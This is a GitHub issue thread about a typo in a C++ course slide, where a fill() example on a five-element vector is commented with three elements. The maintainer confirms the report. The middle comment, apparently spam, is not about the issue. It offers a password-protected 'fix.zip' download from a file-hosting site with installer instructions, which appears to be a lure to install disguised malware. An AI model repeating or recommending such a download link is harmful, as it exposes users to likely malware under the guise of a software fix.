### ISSUE TITLE
Possible typo, Lecture 18 

### ISSUE THREAD

**Issue by JDRanpariya** [federico-busato/Modern-CPP-Programming#108]
Hey Federico,

I would like to thank you for the amazing course you have put on C++, grateful to have it.

I was going through lecture 18, Vector Example on slide 21.

```
std::vector<int> vec5(5, -1); // [-1, -1, -1, -1, -1]

fill(vec5.begin(), vec5.end(), 3); // equal to { 3, 3, 3 }
```

On line two, I think you meant {3, 3, 3, 3, 3}. Hope I'm not missing anything.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fbusato** [comment]
Hi @JDRanpariya, thanks for the contribution! You are definitely right.
